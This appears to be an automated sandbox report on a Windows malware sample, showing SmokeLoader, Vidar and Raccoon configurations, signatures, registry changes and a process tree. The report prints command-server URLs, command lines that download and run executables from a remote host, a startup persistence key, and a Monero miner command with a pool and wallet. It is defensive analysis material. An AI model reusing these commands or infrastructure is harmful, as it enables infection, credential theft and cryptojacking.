Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
11/01/2022, 20:22
Static task
static1
General
-
Target
614ae41db644f93f9e99f41b07629884.exe
-
Size
279KB
-
MD5
614ae41db644f93f9e99f41b07629884
-
SHA1
a1a80f51d64ec56bf909ec75f170554f2035b261
-
SHA256
67b16577f8ea1ce165abf063882fb2e1c7d8c2229c9dfbd60c08b84b5a8f3f96
-
SHA512
337c42cd1d78ad6096d43529f15633e70cc1a737d7d84e4d97b2eb7ddd13aeb5321b6fd6544575d0fde0d58de5d19ae7c77d8a9a9040350fd57fb5b654f7dba0
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
vidar
49.6
1125
https://noc.social/@banda5ker
https://mastodon.social/@banda6ker
-
profile_id
1125
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral1/memory/1380-77-0x0000000000240000-0x000000000025C000-memory.dmp family_arkei behavioral1/memory/1380-78-0x0000000000400000-0x0000000000455000-memory.dmp family_arkei -
LoaderBot executable 2 IoCs
resource yara_rule behavioral1/memory/1100-222-0x0000000000D90000-0x00000000011EB000-memory.dmp loaderbot behavioral1/memory/1100-223-0x0000000000D90000-0x00000000011EB000-memory.dmp loaderbot -
Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/1576-183-0x0000000000400000-0x00000000005A8000-memory.dmp family_vidar behavioral1/memory/1576-184-0x0000000000400000-0x00000000005A8000-memory.dmp family_vidar behavioral1/memory/1576-193-0x0000000000400000-0x00000000005A8000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
flow pid Process 97 276 WScript.exe 98 276 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 47 IoCs
pid Process 1480 7455.exe 1380 7F72.exe 1076 961E.exe 2000 961E.exe 1600 FADA.exe 1720 B82.exe 1920 FE6.exe 604 1EF4.exe 608 extd.exe 1596 extd.exe 1704 2D09.exe 1484 setup_c.exe 1136 extd.exe 584 setup_m.exe 1584 extd.exe 1576 3ED5.exe 1100 setup_s.exe 2008 extd.exe 1380 Driver.exe 1076 Driver.exe 1596 Driver.exe 1976 Driver.exe 1164 Driver.exe 984 Driver.exe 936 Driver.exe 1732 Driver.exe 1488 Driver.exe 1200 Driver.exe 1808 Driver.exe 936 Driver.exe 1008 Driver.exe 1204 Driver.exe 876 Driver.exe 1748 Driver.exe 656 Driver.exe 1732 Driver.exe 1984 Driver.exe 1848 Driver.exe 1536 Driver.exe 1760 Driver.exe 1968 Driver.exe 1920 Driver.exe 1636 Driver.exe 1988 Driver.exe 920 Driver.exe 2008 Driver.exe 1972 Driver.exe -
resource yara_rule behavioral1/files/0x000600000001267c-134.dat upx behavioral1/files/0x000600000001267c-136.dat upx behavioral1/files/0x000600000001267c-142.dat upx behavioral1/files/0x000600000001267c-151.dat upx behavioral1/files/0x000600000001267c-158.dat upx behavioral1/files/0x000600000001267c-204.dat upx -
Deletes itself 1 IoCs
pid Process 1420 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup_s.exe -
Loads dropped DLL 13 IoCs
pid Process 1076 961E.exe 276 WerFault.exe 276 WerFault.exe 276 WerFault.exe 276 WerFault.exe 276 WerFault.exe 276 WerFault.exe 276 WerFault.exe 1100 setup_s.exe 1576 3ED5.exe 1576 3ED5.exe 1576 3ED5.exe 1576 3ED5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup_m.exe Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_s.exe" setup_s.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1920 FE6.exe 584 setup_m.exe 1576 3ED5.exe 1100 setup_s.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1100 set thread context of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1076 set thread context of 2000 1076 961E.exe 31 PID 1720 set thread context of 924 1720 B82.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 276 1600 WerFault.exe 34 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7455.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7455.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7455.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 614ae41db644f93f9e99f41b07629884.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 614ae41db644f93f9e99f41b07629884.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 614ae41db644f93f9e99f41b07629884.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3ED5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3ED5.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2008 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 876 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 3ED5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 3ED5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 3ED5.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
pid Process 608 extd.exe 1596 extd.exe 1484 setup_c.exe 1136 extd.exe 584 setup_m.exe 1584 extd.exe 1100 setup_s.exe 2008 extd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1840 614ae41db644f93f9e99f41b07629884.exe 1840 614ae41db644f93f9e99f41b07629884.exe 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1420 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1840 614ae41db644f93f9e99f41b07629884.exe 1480 7455.exe 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1076 961E.exe Token: SeShutdownPrivilege 1420 Process not Found Token: SeShutdownPrivilege 1420 Process not Found Token: SeDebugPrivilege 2000 961E.exe Token: SeShutdownPrivilege 1420 Process not Found Token: SeDebugPrivilege 924 AppLaunch.exe Token: SeShutdownPrivilege 1420 Process not Found Token: SeDebugPrivilege 584 setup_m.exe Token: SeDebugPrivilege 1100 setup_s.exe Token: SeDebugPrivilege 1920 FE6.exe Token: SeDebugPrivilege 276 WerFault.exe Token: SeShutdownPrivilege 1420 Process not Found Token: SeDebugPrivilege 876 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1420 Process not Found 1420 Process not Found -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1420 Process not Found 1420 Process not Found 1420 Process not Found 1420 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1100 wrote to memory of 1840 1100 614ae41db644f93f9e99f41b07629884.exe 27 PID 1420 wrote to memory of 1480 1420 Process not Found 28 PID 1420 wrote to memory of 1480 1420 Process not Found 28 PID 1420 wrote to memory of 1480 1420 Process not Found 28 PID 1420 wrote to memory of 1480 1420 Process not Found 28 PID 1420 wrote to memory of 1380 1420 Process not Found 29 PID 1420 wrote to memory of 1380 1420 Process not Found 29 PID 1420 wrote to memory of 1380 1420 Process not Found 29 PID 1420 wrote to memory of 1380 1420 Process not Found 29 PID 1420 wrote to memory of 1076 1420 Process not Found 30 PID 1420 wrote to memory of 1076 1420 Process not Found 30 PID 1420 wrote to memory of 1076 1420 Process not Found 30 PID 1420 wrote to memory of 1076 1420 Process not Found 30 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1076 wrote to memory of 2000 1076 961E.exe 31 PID 1420 wrote to memory of 1600 1420 Process not Found 34 PID 1420 wrote to memory of 1600 1420 Process not Found 34 PID 1420 wrote to memory of 1600 1420 Process not Found 34 PID 1420 wrote to memory of 1600 1420 Process not Found 34 PID 1420 wrote to memory of 1720 1420 Process not Found 36 PID 1420 wrote to memory of 1720 1420 Process not Found 36 PID 1420 wrote to memory of 1720 1420 Process not Found 36 PID 1420 wrote to memory of 1720 1420 Process not Found 36 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1720 wrote to memory of 924 1720 B82.exe 37 PID 1420 wrote to memory of 1920 1420 Process not Found 38 PID 1420 wrote to memory of 1920 1420 Process not Found 38 PID 1420 wrote to memory of 1920 1420 Process not Found 38 PID 1420 wrote to memory of 1920 1420 Process not Found 38 PID 1420 wrote to memory of 604 1420 Process not Found 39 PID 1420 wrote to memory of 604 1420 Process not Found 39 PID 1420 wrote to memory of 604 1420 Process not Found 39 PID 1420 wrote to memory of 604 1420 Process not Found 39 PID 604 wrote to memory of 1660 604 1EF4.exe 41 PID 604 wrote to memory of 1660 604 1EF4.exe 41 PID 604 wrote to memory of 1660 604 1EF4.exe 41 PID 604 wrote to memory of 1660 604 1EF4.exe 41 PID 1660 wrote to memory of 608 1660 cmd.exe 42 PID 1660 wrote to memory of 608 1660 cmd.exe 42 PID 1660 wrote to memory of 608 1660 cmd.exe 42 PID 1660 wrote to memory of 608 1660 cmd.exe 42 PID 1660 wrote to memory of 276 1660 cmd.exe 43 PID 1660 wrote to memory of 276 1660 cmd.exe 43 PID 1660 wrote to memory of 276 1660 cmd.exe 43 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"C:\Users\Admin\AppData\Local\Temp\614ae41db644f93f9e99f41b07629884.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\7455.exeC:\Users\Admin\AppData\Local\Temp\7455.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1480
-
C:\Users\Admin\AppData\Local\Temp\7F72.exeC:\Users\Admin\AppData\Local\Temp\7F72.exe1⤵
- Executes dropped EXE
PID:1380
-
C:\Users\Admin\AppData\Local\Temp\961E.exeC:\Users\Admin\AppData\Local\Temp\961E.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\961E.exeC:\Users\Admin\AppData\Local\Temp\961E.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Users\Admin\AppData\Local\Temp\FADA.exeC:\Users\Admin\AppData\Local\Temp\FADA.exe1⤵
- Executes dropped EXE
PID:1600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 4362⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
C:\Users\Admin\AppData\Local\Temp\B82.exeC:\Users\Admin\AppData\Local\Temp\B82.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\FE6.exeC:\Users\Admin\AppData\Local\Temp\FE6.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
C:\Users\Admin\AppData\Local\Temp\1EF4.exeC:\Users\Admin\AppData\Local\Temp\1EF4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\2168.bat C:\Users\Admin\AppData\Local\Temp\1EF4.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12230\123.vbs"3⤵
- Blocklisted process makes network request
PID:276
-
-
C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\12230\setup_c.exesetup_c.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1136
-
-
C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\12230\setup_m.exesetup_m.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2156.tmp\2157.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\12230\setup_s.exesetup_s.exe3⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1380
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1076
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1596
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1976
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1164
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:984
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:936
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1732
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1488
-
-
